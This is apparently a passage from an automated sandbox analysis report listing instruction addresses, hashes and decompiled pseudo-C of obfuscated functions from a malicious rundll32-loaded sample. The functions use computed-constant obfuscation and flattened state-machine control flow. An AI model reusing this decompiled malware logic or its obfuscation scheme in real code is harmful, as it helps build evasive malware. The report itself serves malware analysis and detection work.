                                                                                                                    0x003469d7
                                                                                                                    0x003469db
                                                                                                                    0x003469e3
                                                                                                                    0x003469eb
                                                                                                                    0x003469f3
                                                                                                                    0x003469fb
                                                                                                                    0x00346a08
                                                                                                                    0x00346a09
                                                                                                                    0x00346a0d
                                                                                                                    0x00346a15
                                                                                                                    0x00346a22
                                                                                                                    0x00346a26
                                                                                                                    0x00346a2e
                                                                                                                    0x00346a36
                                                                                                                    0x00346a3e
                                                                                                                    0x00346a4c
                                                                                                                    0x00346a50
                                                                                                                    0x00346a60
                                                                                                                    0x00346a74
                                                                                                                    0x00346a74
                                                                                                                    0x00346a82
                                                                                                                    0x00346b0d
                                                                                                                    0x00346b16
                                                                                                                    0x00346b1e
                                                                                                                    0x00346b2f
                                                                                                                    0x00346b34
                                                                                                                    0x00346b47
                                                                                                                    0x00346b6a
                                                                                                                    0x00346b7c
                                                                                                                    0x00346b81
                                                                                                                    0x00346b84
                                                                                                                    0x00000000
                                                                                                                    0x00346a88
                                                                                                                    0x00346a8e
                                                                                                                    0x00346b06
                                                                                                                    0x00000000
                                                                                                                    0x00346a90
                                                                                                                    0x00346a90
                                                                                                                    0x00346a92
                                                                                                                    0x00346a98
                                                                                                                    0x00346aa1
                                                                                                                    0x00346aa9
                                                                                                                    0x00346aba
                                                                                                                    0x00346ad2
                                                                                                                    0x00346ae5
                                                                                                                    0x00346af7
                                                                                                                    0x00346afc
                                                                                                                    0x00346aff
                                                                                                                    0x00000000
                                                                                                                    0x00346aff
                                                                                                                    0x00346a92
                                                                                                                    0x00346a8e
                                                                                                                    0x00000000
                                                                                                                    0x00346a82
                                                                                                                    0x00346b8e
                                                                                                                    0x00346b99
                                                                                                                    0x00346b9a
                                                                                                                    0x00346ba9
                                                                                                                    0x00346bae
                                                                                                                    0x00346bb1
                                                                                                                    0x00346bb3
                                                                                                                    0x00346bb3
                                                                                                                    0x00346bb3
                                                                                                                    0x00346bc5

                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000009.00000002.494709664.0000000000331000.00000020.00000800.00020000.00000000.sdmp, Offset: 00330000, based on PE: true
                                                                                                                    • Associated: 00000009.00000002.494704127.0000000000330000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494732587.0000000000353000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_9_2_330000_rundll32.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: <E$Md$a@$yw
                                                                                                                    • API String ID: 0-2092248880
                                                                                                                    • Opcode ID: ad609723df5e02ec01d019389cc11f1a7ba2aa242d7f7f8febdee97ff08d70b8
                                                                                                                    • Instruction ID: d929c29401602515a1f4e2e178676795fe9af9137d909203de02d79cc1c10e02
                                                                                                                    • Opcode Fuzzy Hash: ad609723df5e02ec01d019389cc11f1a7ba2aa242d7f7f8febdee97ff08d70b8
                                                                                                                    • Instruction Fuzzy Hash: 88C120B24087809FD369CF25C58A81BBBF2FB94758F108A1DF5A59A260D3B59909CF43
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00335548 Relevance: 5.2, Strings: 4, Instructions: 233COMMONCrypto
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 94%
                                                                                                                    			E00335548(void* __edx, intOrPtr* _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16) {
				char _v16;
				intOrPtr _v24;
				char _v28;
				char _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				char _v64;
				signed int _v68;
				char _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				unsigned int _v116;
				signed int _v120;
				signed int _v124;
				signed int _v128;
				signed int _v132;
				signed int _v136;
				signed int _v140;
				signed int _v144;
				signed int _v148;
				void* __ecx;
				void* _t190;
				void* _t206;
				void* _t208;
				signed int _t209;
				char* _t211;
				signed int _t212;
				intOrPtr _t222;
				intOrPtr* _t225;
				void* _t227;
				char* _t229;
				char _t233;
				intOrPtr _t255;
				intOrPtr* _t257;
				signed int _t258;
				signed int _t259;
				signed int _t260;
				signed int* _t263;

				_t225 = _a16;
				_t257 = _a4;
				_push(_t225);
				_push(_a12);
				_push(_a8);
				_push(_t257);
				_push(__edx);
				E003420B9(_t190);
				_v56 = 0xb9e7cb;
				_t255 = 0;
				_v52 = 0x6e87b5;
				_t263 =  &(( &_v148)[6]);
				_v48 = 0;
				_v44 = 0;
				_t227 = 0x3ccc1e9;
				_v128 = 0x85629b;
				_t258 = 0x62;
				_v128 = _v128 * 0x5a;
				_v128 = _v128 + 0xfbaf;
				_v128 = _v128 ^ 0x2ee5a62d;
				_v144 = 0xfc0c7f;
				_v144 = _v144 ^ 0xfdfaf442;
				_v144 = _v144 >> 1;
				_v144 = _v144 | 0x14143ad1;
				_v144 = _v144 ^ 0x7e977ecf;
				_v96 = 0xd1f565;
				_v96 = _v96 * 0x21;
				_v96 = _v96 ^ 0x1b12de47;
				_v104 = 0xb219e8;
				_v104 = _v104 | 0x75a31cc8;
				_v104 = _v104 ^ 0x75be6df4;
				_v80 = 0x6fb9b6;
				_v80 = _v80 * 0x3e;
				_v80 = _v80 ^ 0x1b001c4a;
				_v132 = 0x1154a0;
				_v132 = _v132 << 0xb;
				_v132 = _v132 + 0xfffffde8;
				_v132 = _v132 | 0xd1d436bb;
				_v132 = _v132 ^ 0xdbfeae5a;
				_v76 = 0x5374cd;
				_v76 = _v76 << 2;
				_v76 = _v76 ^ 0x0147cb67;
				_v140 = 0x35e68a;
				_v140 = _v140 + 0xffff467d;
				_v140 = _v140 * 0x7c;
				_v140 = _v140 ^ 0x566bba39;
				_v140 = _v140 ^ 0x4faa8078;
				_v124 = 0xf91357;
				_v124 = _v124 << 0xf;
				_v124 = _v124 + 0xf2e4;
				_v124 = _v124 ^ 0x89afe8a4;
				_v112 = 0xf055e4;
				_v112 = _v112 ^ 0x101963ca;
				_v112 = _v112 | 0x7be8ad21;
				_v112 = _v112 ^ 0x7be17431;
				_v84 = 0x17393b;
				_v84 = _v84 << 6;
				_v84 = _v84 ^ 0x05c81c43;
				_v120 = 0xf688ab;
				_v120 = _v120 / _t258;
				_v120 = _v120 * 0x2d;
				_v120 = _v120 ^ 0x00718a36;
				_v116 = 0xa21f51;
				_v116 = _v116 + 0x3c3b;
				_v116 = _v116 >> 0xa;
				_v116 = _v116 ^ 0x0006c391;
				_v88 = 0x51e239;
				_v88 = _v88 + 0x2ec0;
				_v88 = _v88 ^ 0x0058dd2b;
				_v136 = 0xa92d92;
				_v136 = _v136 >> 0xd;
				_v136 = _v136 ^ 0x0647b396;
				_v136 = _v136 ^ 0x20b7ff2f;
				_v136 = _v136 ^ 0x26fd7475;
				_v108 = 0xb50576;
				_t259 = 0x45;
				_v108 = _v108 / _t259;
				_v108 = _v108 ^ 0xb94dc178;
				_v108 = _v108 ^ 0xb943792d;
				_v148 = 0xb9b260;
				_t260 = 0x14;
				_v148 = _v148 / _t260;
				_v148 = _v148 * 0x3f;
				_v148 = _v148 >> 2;
				_v148 = _v148 ^ 0x009e914b;
				_v92 = 0x6e7d65;
				_v92 = _v92 | 0xb573042f;
				_v92 = _v92 ^ 0xb570b7bc;
				_v100 = 0xfd8f7e;
				_v100 = _v100 * 0x5d;
				_v100 = _v100 ^ 0x5c1db3f3;
				L1:
				while(_t227 != 0x3c16ad4) {
					if(_t227 == 0x3ccc1e9) {
						_t227 = 0x7dbf5b4;
						continue;
					}
					if(_t227 == 0x79abc1a) {
						_t229 =  &_v28;
						_t208 = E0033AEFB(_t229, _v124, _v112, _v84,  &_v16, _v120);
						_t263 =  &(_t263[4]);
						if(_t208 != 0) {
							_push(_t229);
							_push(_t229);
							_t222 = E00337FF2(_v24);
							 *_t257 = _t222;
							if(_t222 != 0) {
								E0033ED7E(_v108,  *_t257, _v148, _v28, _v24);
								_t263 =  &(_t263[3]);
								 *((intOrPtr*)(_t257 + 4)) = _v24;
								_t255 = 1;
							}
						}
						_t227 = 0xdaef9d5;
						continue;
					}
					if(_t227 == 0x7dbf5b4) {
						_t209 =  *((intOrPtr*)(_t225 + 4));
						_t233 =  *_t225;
						_v68 = _t209;
						_v72 = _t233;
						_t211 = _t209 - 1 + _t233;
						while(_t211 > _t233) {
							if( *_t211 == 0) {
								break;
							}
							_t211 = _t211 - 1;
						}
						_t212 = _t211 - _t233;
						_v68 = _t212;
						if(_t212 == 0) {
							L16:
							_t227 = 0xfc35b14;
							continue;
						}
						while(_v68 % _v144 != _v128) {
							_t163 =  &_v68;
							 *_t163 = _v68 - 1;
							if( *_t163 != 0) {
								continue;
							}
							goto L16;
						}
						goto L16;
					}
					if(_t227 == 0xdaef9d5) {
						E00348519(_v92, _v100, _v64);
						L28:
						return _t255;
					}
					if(_t227 != 0xfc35b14) {
						L25:
						if(_t227 != 0xb843ed5) {
							continue;
						}
						goto L28;
					}
					if(E00335E60( &_v72, _v96, _v104,  &_v64) == 0) {
						goto L28;
					}
					_t227 = 0x3c16ad4;
				}
				_t206 = E00338B3D( &_v40, _v80, _v132,  &_v64, _v76, _v140);
				_t263 =  &(_t263[4]);
				if(_t206 == 0) {
					_t227 = 0xdaef9d5;
					goto L25;
				}
				_t227 = 0x79abc1a;
				goto L1;
			}



















































                                                                                                                    0x0033554f
                                                                                                                    0x00335558
                                                                                                                    0x00335560
                                                                                                                    0x00335561
                                                                                                                    0x00335568
                                                                                                                    0x0033556f
                                                                                                                    0x00335570
                                                                                                                    0x00335572
                                                                                                                    0x00335577
                                                                                                                    0x00335582
                                                                                                                    0x00335584
                                                                                                                    0x0033558f
                                                                                                                    0x00335592
                                                                                                                    0x00335598
                                                                                                                    0x0033559c
                                                                                                                    0x003355a1
                                                                                                                    0x003355b0
                                                                                                                    0x003355b1
                                                                                                                    0x003355b5
                                                                                                                    0x003355bd
                                                                                                                    0x003355c5
                                                                                                                    0x003355cd
                                                                                                                    0x003355d5
                                                                                                                    0x003355d9
                                                                                                                    0x003355e1
                                                                                                                    0x003355e9
                                                                                                                    0x003355f6
                                                                                                                    0x003355fa
                                                                                                                    0x00335602
                                                                                                                    0x0033560a
                                                                                                                    0x00335612
                                                                                                                    0x0033561a
                                                                                                                    0x00335627
                                                                                                                    0x0033562b
                                                                                                                    0x00335633
                                                                                                                    0x0033563b
                                                                                                                    0x00335640
                                                                                                                    0x00335648
                                                                                                                    0x00335650
                                                                                                                    0x00335658
                                                                                                                    0x00335660
                                                                                                                    0x00335665
                                                                                                                    0x0033566d
                                                                                                                    0x00335675
                                                                                                                    0x00335682
                                                                                                                    0x00335686
                                                                                                                    0x0033568e
                                                                                                                    0x00335696
                                                                                                                    0x0033569e
                                                                                                                    0x003356a3
                                                                                                                    0x003356ab
                                                                                                                    0x003356b3
                                                                                                                    0x003356bb
                                                                                                                    0x003356c3
                                                                                                                    0x003356cb
                                                                                                                    0x003356d3
                                                                                                                    0x003356db
                                                                                                                    0x003356e0
                                                                                                                    0x003356e8
                                                                                                                    0x003356f6
                                                                                                                    0x003356ff
                                                                                                                    0x00335703
                                                                                                                    0x0033570b
                                                                                                                    0x00335713
                                                                                                                    0x0033571b
                                                                                                                    0x00335720
                                                                                                                    0x00335728
                                                                                                                    0x00335730
                                                                                                                    0x0033573a
                                                                                                                    0x00335742
                                                                                                                    0x0033574a
                                                                                                                    0x0033574f
                                                                                                                    0x00335757
                                                                                                                    0x0033575f
                                                                                                                    0x00335767
                                                                                                                    0x00335775
                                                                                                                    0x0033577a
                                                                                                                    0x00335780
                                                                                                                    0x00335788
                                                                                                                    0x00335790
                                                                                                                    0x0033579c
                                                                                                                    0x003357a4
                                                                                                                    0x003357ad
                                                                                                                    0x003357b1
                                                                                                                    0x003357b6
                                                                                                                    0x003357be
                                                                                                                    0x003357c6
                                                                                                                    0x003357ce
                                                                                                                    0x003357d6
                                                                                                                    0x003357e3
                                                                                                                    0x003357e7
                                                                                                                    0x00000000
                                                                                                                    0x003357ef
                                                                                                                    0x00335801
                                                                                                                    0x0033591d
                                                                                                                    0x00000000
                                                                                                                    0x0033591d
                                                                                                                    0x0033580d
                                                                                                                    0x003358ac
                                                                                                                    0x003358bb
                                                                                                                    0x003358c0
                                                                                                                    0x003358c5
                                                                                                                    0x003358da
                                                                                                                    0x003358db
                                                                                                                    0x003358dc
                                                                                                                    0x003358e1
                                                                                                                    0x003358e7
                                                                                                                    0x00335901
                                                                                                                    0x0033590f
                                                                                                                    0x00335912
                                                                                                                    0x00335915
                                                                                                                    0x00335915
                                                                                                                    0x003358e7
                                                                                                                    0x00335916
                                                                                                                    0x00000000
                                                                                                                    0x00335916
                                                                                                                    0x00335819
                                                                                                                    0x00335856
                                                                                                                    0x00335859
                                                                                                                    0x0033585b
                                                                                                                    0x00335860
                                                                                                                    0x00335864
                                                                                                                    0x0033586e
                                                                                                                    0x0033586b
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x0033586d
                                                                                                                    0x0033586d
                                                                                                                    0x00335872
                                                                                                                    0x00335874
                                                                                                                    0x00335878
                                                                                                                    0x00335892
                                                                                                                    0x00335892
                                                                                                                    0x00000000
                                                                                                                    0x00335892
                                                                                                                    0x0033587a
                                                                                                                    0x0033588c
                                                                                                                    0x0033588c
                                                                                                                    0x00335890
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00335890
                                                                                                                    0x00000000
                                                                                                                    0x0033587a
                                                                                                                    0x0033581d
                                                                                                                    0x00335975
                                                                                                                    0x0033597b
                                                                                                                    0x00335987
                                                                                                                    0x00335987
                                                                                                                    0x00335829
                                                                                                                    0x0033595b
                                                                                                                    0x00335961
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00335967
                                                                                                                    0x00335849
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x0033584f
                                                                                                                    0x0033584f
                                                                                                                    0x00335943
                                                                                                                    0x00335948
                                                                                                                    0x0033594d
                                                                                                                    0x00335959
                                                                                                                    0x00000000
                                                                                                                    0x00335959
                                                                                                                    0x0033594f
                                                                                                                    0x00000000

                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000009.00000002.494709664.0000000000331000.00000020.00000800.00020000.00000000.sdmp, Offset: 00330000, based on PE: true
                                                                                                                    • Associated: 00000009.00000002.494704127.0000000000330000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494732587.0000000000353000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_9_2_330000_rundll32.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: 1t{$9Q$;<$e}n
                                                                                                                    • API String ID: 0-2095593254
                                                                                                                    • Opcode ID: 3e729f004d8ed529ecf323f69a5bd049de09d4616ed983f039155076c9e898ed
                                                                                                                    • Instruction ID: 0ee51a938fca8ddedf3946039bc2142c483804f526292a7d00c5f30e50200105
                                                                                                                    • Opcode Fuzzy Hash: 3e729f004d8ed529ecf323f69a5bd049de09d4616ed983f039155076c9e898ed
                                                                                                                    • Instruction Fuzzy Hash: 15B140B1108381DFC329CF26C58591BBBF1FBC4748F50891DF6969A260D7B18A4ACF42
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00347DD5 Relevance: 5.2, Strings: 4, Instructions: 226COMMONCrypto
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 95%
                                                                                                                    			E00347DD5() {
				char _v520;
				char _v1040;
				signed int _v1044;
				signed int _v1048;
				intOrPtr _v1052;
				intOrPtr _v1056;
				unsigned int _v1060;
				signed int _v1064;
				signed int _v1068;
				signed int _v1072;
				signed int _v1076;
				signed int _v1080;
				signed int _v1084;
				signed int _v1088;
				signed int _v1092;
				signed int _v1096;
				signed int _v1100;
				signed int _v1104;
				signed int _v1108;
				signed int _v1112;
				signed int _v1116;
				signed int _v1120;
				signed int _v1124;
				signed int _v1128;
				signed int _v1132;
				signed int _v1136;
				signed int _v1140;
				signed int _v1144;
				signed int _v1148;
				signed int _v1152;
				signed int _v1156;
				intOrPtr _t236;
				void* _t241;
				short* _t244;
				void* _t247;
				void* _t250;
				intOrPtr _t256;
				intOrPtr _t272;
				signed int _t278;
				signed int _t279;
				signed int _t280;
				signed int* _t283;

				_t283 =  &_v1156;
				_v1048 = _v1048 & 0x00000000;
				_v1044 = _v1044 & 0x00000000;
				_t250 = 0x1242b9;
				_v1056 = 0xc74a30;
				_v1052 = 0xdc93e6;
				_v1140 = 0x94ae82;
				_v1140 = _v1140 * 0x5d;
				_v1140 = _v1140 | 0xd08f5b59;
				_t278 = 0x3b;
				_v1140 = _v1140 / _t278;
				_v1140 = _v1140 ^ 0x042b78b4;
				_v1060 = 0xf2c7d8;
				_v1060 = _v1060 >> 0xe;
				_v1060 = _v1060 ^ 0x000b32e4;
				_v1084 = 0xadf7c1;
				_v1084 = _v1084 >> 7;
				_v1084 = _v1084 ^ 0x0005ae79;
				_v1068 = 0x4ca2f2;
				_v1068 = _v1068 | 0x7f3e9315;
				_v1068 = _v1068 ^ 0x7f77e091;
				_v1148 = 0xfaa01c;
				_v1148 = _v1148 | 0x0a84fcb5;
				_t279 = 0x3d;
				_v1148 = _v1148 / _t279;
				_v1148 = _v1148 + 0xffff92ee;
				_v1148 = _v1148 ^ 0x0020489e;
				_v1104 = 0xbd50a4;
				_v1104 = _v1104 | 0x802f8c80;
				_v1104 = _v1104 ^ 0xe2a4d8db;
				_v1104 = _v1104 ^ 0x621899e9;
				_v1096 = 0x4ec4a;
				_t280 = 0x27;
				_v1096 = _v1096 / _t280;
				_v1096 = _v1096 ^ 0x000ca7f0;
				_v1156 = 0x496e13;
				_v1156 = _v1156 << 0xb;
				_v1156 = _v1156 + 0xffff34c4;
				_v1156 = _v1156 ^ 0xea67072b;
				_v1156 = _v1156 ^ 0xa10c07e0;
				_v1132 = 0x5417d7;
				_v1132 = _v1132 ^ 0x2d0a29d3;
				_v1132 = _v1132 * 0x11;
				_v1132 = _v1132 ^ 0x95d68b4c;
				_v1132 = _v1132 ^ 0x969bce68;
				_v1108 = 0x3d434d;
				_t83 =  &_v1108; // 0x3d434d
				_v1108 =  *_t83 * 0x5d;
				_v1108 = _v1108 + 0xbd1d;
				_v1108 = _v1108 ^ 0x16426462;
				_v1064 = 0x905f90;
				_v1064 = _v1064 << 7;
				_v1064 = _v1064 ^ 0x482aff2b;
				_v1076 = 0xa70fe8;
				_v1076 = _v1076 ^ 0x0f6696b3;
				_v1076 = _v1076 ^ 0x0fce7292;
				_v1144 = 0x5add64;
				_v1144 = _v1144 * 0x72;
				_v1144 = _v1144 >> 2;
				_v1144 = _v1144 + 0xffffbbe0;
				_v1144 = _v1144 ^ 0x0a105df6;
				_v1112 = 0xa934e1;
				_v1112 = _v1112 + 0xffff3dc6;
				_v1112 = _v1112 ^ 0xf71e7087;
				_v1112 = _v1112 ^ 0xf7bbdd65;
				_v1152 = 0xfe7bab;
				_v1152 = _v1152 + 0xffffe121;
				_v1152 = _v1152 << 7;
				_v1152 = _v1152 + 0xffffae88;
				_v1152 = _v1152 ^ 0x7f211c18;
				_v1092 = 0x242707;
				_v1092 = _v1092 >> 6;
				_v1092 = _v1092 ^ 0x0003c6d8;
				_v1136 = 0xebac4f;
				_v1136 = _v1136 + 0x4c15;
				_v1136 = _v1136 >> 0xf;
				_v1136 = _v1136 ^ 0xdf38e0e8;
				_v1136 = _v1136 ^ 0xdf3b1dfc;
				_v1120 = 0x4eb7ab;
				_v1120 = _v1120 << 2;
				_v1120 = _v1120 + 0xffff85cc;
				_v1120 = _v1120 ^ 0x01347c50;
				_v1088 = 0xc2f923;
				_v1088 = _v1088 * 0xf;
				_v1088 = _v1088 ^ 0x0b6c1f22;
				_v1080 = 0xbf02c1;
				_v1080 = _v1080 + 0xffffcd4c;
				_v1080 = _v1080 ^ 0x00bd8b7d;
				_v1128 = 0xfef10;
				_v1128 = _v1128 + 0xfa25;
				_v1128 = _v1128 + 0xffffb342;
				_v1128 = _v1128 + 0x2fe7;
				_v1128 = _v1128 ^ 0x00107547;
				_v1116 = 0x30091d;
				_v1116 = _v1116 | 0x682f5e67;
				_v1116 = _v1116 * 0xf;
				_v1116 = _v1116 ^ 0x1bb1960a;
				_v1100 = 0xdd7fbe;
				_v1100 = _v1100 >> 0xf;
				_v1100 = _v1100 + 0xffff26d4;
				_v1100 = _v1100 ^ 0xfff0a895;
				_v1072 = 0xd8d782;
				_v1072 = _v1072 + 0xffff857d;
				_v1072 = _v1072 ^ 0x00daabd2;
				_v1124 = 0x615b7c;
				_v1124 = _v1124 >> 0x10;
				_v1124 = _v1124 * 0x3d;
				_v1124 = _v1124 ^ 0x000147a1;
				L1:
				while(_t250 != 0x1242b9) {
					if(_t250 == 0x56337fc) {
						E00346C49(_v1144, _v1112, _v1152, _v1092,  &_v520);
						_push(_v1088);
						_push( &_v520);
						_push(_v1120);
						E003513AD(_v1136,  &_v1040, __eflags);
						_t283 =  &(_t283[6]);
						_t250 = 0x8d6676f;
						continue;
					}
					if(_t250 == 0x5f94146) {
						_push(_v1148);
						_push(_v1068);
						_t241 = E0034DCF7(_v1084, 0x331000, __eflags);
						_t256 =  *0x353e10; // 0x0
						_t272 =  *0x353e10; // 0x0
						E003347CE(_t272 + 0x23c, _v1104, _t256 + 0x1c, _v1096, _v1156, _t241, _t256 + 0x1c, _v1132, _v1108);
						E0033A8B0(_v1064, _t241, _v1076);
						_t283 =  &(_t283[9]);
						_t250 = 0x56337fc;
						continue;
					}
					if(_t250 == 0x8d6676f) {
						_t244 = E0033B6CF( &_v1040, _v1080, _v1128, _v1116);
						__eflags = 0;
						 *_t244 = 0;
						return E0033B1C6( &_v1040, _v1100, _v1072, _v1124);
					}
					if(_t250 == 0xbcbde3e) {
						_t247 = E0034473C();
						L8:
						_t250 = 0x5f94146;
						continue;
					}
					if(_t250 != 0xf4317dc) {
						L15:
						__eflags = _t250 - 0xfb0317f;
						if(__eflags != 0) {
							continue;
						}
						return _t247;
					}
					_t247 = E00333E3F();
					goto L8;
				}
				_t236 =  *0x353e10; // 0x0
				__eflags =  *((intOrPtr*)(_t236 + 0x450));
				if(__eflags == 0) {
					_t250 = 0xf4317dc;
					goto L15;
				}
				_t250 = 0xbcbde3e;
				goto L1;
			}













































                                                                                                                    0x00347dd5
                                                                                                                    0x00347ddb
                                                                                                                    0x00347de2
                                                                                                                    0x00347de7
                                                                                                                    0x00347dec
                                                                                                                    0x00347df4
                                                                                                                    0x00347dfc
                                                                                                                    0x00347e0d
                                                                                                                    0x00347e11
                                                                                                                    0x00347e1f
                                                                                                                    0x00347e24
                                                                                                                    0x00347e2a
                                                                                                                    0x00347e32
                                                                                                                    0x00347e3a
                                                                                                                    0x00347e3f
                                                                                                                    0x00347e47
                                                                                                                    0x00347e4f
                                                                                                                    0x00347e54
                                                                                                                    0x00347e5c
                                                                                                                    0x00347e64
                                                                                                                    0x00347e6c
                                                                                                                    0x00347e74
                                                                                                                    0x00347e7c
                                                                                                                    0x00347e88
                                                                                                                    0x00347e8d
                                                                                                                    0x00347e93
                                                                                                                    0x00347e9b
                                                                                                                    0x00347ea3
                                                                                                                    0x00347eab
                                                                                                                    0x00347eb3
                                                                                                                    0x00347ebb
                                                                                                                    0x00347ec3
                                                                                                                    0x00347ecf
                                                                                                                    0x00347ed2
                                                                                                                    0x00347ed6
                                                                                                                    0x00347ede
                                                                                                                    0x00347ee6
                                                                                                                    0x00347eeb
                                                                                                                    0x00347ef3
                                                                                                                    0x00347efb
                                                                                                                    0x00347f03
                                                                                                                    0x00347f0b
                                                                                                                    0x00347f18
                                                                                                                    0x00347f1c
                                                                                                                    0x00347f24
                                                                                                                    0x00347f2c
                                                                                                                    0x00347f34
                                                                                                                    0x00347f39
                                                                                                                    0x00347f3d
                                                                                                                    0x00347f45
                                                                                                                    0x00347f4d
                                                                                                                    0x00347f55
                                                                                                                    0x00347f5a
                                                                                                                    0x00347f62
                                                                                                                    0x00347f6a
                                                                                                                    0x00347f72
                                                                                                                    0x00347f7a
                                                                                                                    0x00347f87
                                                                                                                    0x00347f8b
                                                                                                                    0x00347f90
                                                                                                                    0x00347f98
                                                                                                                    0x00347fa0
                                                                                                                    0x00347fa8
                                                                                                                    0x00347fb0
                                                                                                                    0x00347fbd
                                                                                                                    0x00347fca
                                                                                                                    0x00347fd7
                                                                                                                    0x00347fdf
                                                                                                                    0x00347fe4
                                                                                                                    0x00347fec
                                                                                                                    0x00347ff4
                                                                                                                    0x00347ffc
                                                                                                                    0x00348001
                                                                                                                    0x00348009
                                                                                                                    0x00348011
                                                                                                                    0x00348019
                                                                                                                    0x0034801e
                                                                                                                    0x00348026
                                                                                                                    0x0034802e
                                                                                                                    0x00348036
                                                                                                                    0x0034803b
                                                                                                                    0x00348043
                                                                                                                    0x0034804b
                                                                                                                    0x00348058
                                                                                                                    0x0034805c
                                                                                                                    0x00348064
                                                                                                                    0x0034806c
                                                                                                                    0x00348074
                                                                                                                    0x0034807c
                                                                                                                    0x00348084
                                                                                                                    0x0034808c
                                                                                                                    0x00348094
                                                                                                                    0x0034809c
                                                                                                                    0x003480a4
                                                                                                                    0x003480ac
                                                                                                                    0x003480b9
                                                                                                                    0x003480bd
                                                                                                                    0x003480c5
                                                                                                                    0x003480cd
                                                                                                                    0x003480d2
                                                                                                                    0x003480da
                                                                                                                    0x003480e2
                                                                                                                    0x003480ea
                                                                                                                    0x003480f2
                                                                                                                    0x003480fa
                                                                                                                    0x00348102
                                                                                                                    0x0034810c
                                                                                                                    0x00348110
                                                                                                                    0x00000000
                                                                                                                    0x00348118
                                                                                                                    0x0034812a
                                                                                                                    0x003481f0
                                                                                                                    0x003481f5
                                                                                                                    0x00348200
                                                                                                                    0x00348201
                                                                                                                    0x00348210
                                                                                                                    0x00348215
                                                                                                                    0x00348218
                                                                                                                    0x00000000
                                                                                                                    0x00348218
                                                                                                                    0x00348132
                                                                                                                    0x00348164
                                                                                                                    0x0034816d
                                                                                                                    0x00348175
                                                                                                                    0x00348186
                                                                                                                    0x0034819e
                                                                                                                    0x003481b1
                                                                                                                    0x003481c6
                                                                                                                    0x003481cb
                                                                                                                    0x003481ce
                                                                                                                    0x00000000
                                                                                                                    0x003481ce
                                                                                                                    0x0034813a
                                                                                                                    0x0034825a
                                                                                                                    0x00348263
                                                                                                                    0x0034826d
                                                                                                                    0x00000000
                                                                                                                    0x0034827c
                                                                                                                    0x00348142
                                                                                                                    0x0034815d
                                                                                                                    0x00348155
                                                                                                                    0x00348155
                                                                                                                    0x00000000
                                                                                                                    0x00348155
                                                                                                                    0x00348146
                                                                                                                    0x00348239
                                                                                                                    0x00348239
                                                                                                                    0x0034823f
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x0034823f
                                                                                                                    0x00348150
                                                                                                                    0x00000000
                                                                                                                    0x00348150
                                                                                                                    0x00348222
                                                                                                                    0x00348227
                                                                                                                    0x0034822e
                                                                                                                    0x00348237
                                                                                                                    0x00000000
                                                                                                                    0x00348237
                                                                                                                    0x00348230
                                                                                                                    0x00000000

                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000009.00000002.494709664.0000000000331000.00000020.00000800.00020000.00000000.sdmp, Offset: 00330000, based on PE: true
                                                                                                                    • Associated: 00000009.00000002.494704127.0000000000330000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494732587.0000000000353000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_9_2_330000_rundll32.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: MC=$g^/h$|[a$/
                                                                                                                    • API String ID: 0-1545830693
                                                                                                                    • Opcode ID: e47bf4ffab7be807d6d083f29f856b9181a712ccf63a2671f00e3dc5503a8594
                                                                                                                    • Instruction ID: c2b23c8c23d26c3928bc53313a09375942a0244b7a87e2dae738d2f441663487
                                                                                                                    • Opcode Fuzzy Hash: e47bf4ffab7be807d6d083f29f856b9181a712ccf63a2671f00e3dc5503a8594
                                                                                                                    • Instruction Fuzzy Hash: EFC10EB11083818FC369CF25C58A91FFBE1BBC4758F508A1DF1969A260D7B59A4ACF42
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 0034A2E8 Relevance: 5.2, Strings: 4, Instructions: 201COMMONCrypto
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 96%
                                                                                                                    			E0034A2E8(intOrPtr __ecx, intOrPtr* __edx) {
				intOrPtr _v4;
				intOrPtr* _v8;
				intOrPtr _v12;
				char _v16;
				signed int _v20;
				intOrPtr _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				intOrPtr _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				intOrPtr _t184;
				intOrPtr* _t189;
				intOrPtr _t193;
				intOrPtr _t196;
